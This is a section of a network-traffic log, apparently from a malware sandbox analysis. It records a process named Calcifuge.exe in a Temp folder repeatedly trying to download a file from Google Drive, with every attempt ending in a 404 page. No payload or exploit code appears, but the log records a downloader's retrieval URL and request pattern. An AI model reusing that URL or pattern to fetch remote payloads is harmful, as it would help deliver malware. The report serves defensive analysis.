                                                                                              2025-01-11 02:53:24 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 47 62 61 70 72 5f 2d 6f 44 31 53 69 41 73 69 5f 6e 4b 65 32 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rGbapr_-oD1SiAsi_nKe2w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              48192.168.2.453740172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:25 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:25 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:25 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'nonce-8eYJ5Em_3DylzG3jA1AvPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              49192.168.2.453749172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:26 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:26 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgSa8xXcBMP2cImUQNK7_X4ldih_6pHcgu-V9km2ltnFqcFcyEG5F8nKPHEP88vGSc48GZN5K10
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:26 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-1oS_KEGaPphbIX4rFVe1eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:26 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 58 53 78 49 61 71 59 38 66 4b 6e 77 77 4d 6c 6a 56 32 30 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0XSxIaqY8fKnwwMljV204A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              50192.168.2.453757172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:27 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:27 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:27 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-8K-onY4E1RkAorApmnDxNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              51192.168.2.453763172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:28 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:28 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgS8cQ0kWj-oudw8qbCzmOa1EJoW5KumnoCikkFPmbhR4Ngi5_c197TvS68Lkayg37REULMgrz8
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:28 GMT
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-dL7VXpJCvqk05agcTG3-1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:28 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 77 68 47 32 76 6c 6f 79 30 42 39 2d 43 39 32 43 75 5f 47 42 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wwhG2vloy0B9-C92Cu_GBA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              52192.168.2.453773172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:29 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:30 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:29 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-4yXUiVeknKhRSsgh3N08Ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              53192.168.2.453774172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:30 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:31 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4TyP7HKEo-aCqmH3kOXv3wrnFzhS4i8YRWj_6yP3Lx7Uo1DR4e0FEwEJgboFEX9tXGHNBsWP8
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:31 GMT
                                                                                              Content-Security-Policy: script-src 'nonce-sWdDrQwxsaTT7Q_tfPZJfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:31 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 6f 6f 74 57 35 6e 6d 67 75 66 4e 64 5a 6e 5f 41 6a 65 45 42 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4ootW5nmgufNdZn_AjeEBw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              54192.168.2.453775172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:32 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:32 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:32 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-MKo3zsscpTMlnfVlI7bT1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              55192.168.2.453776172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:33 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
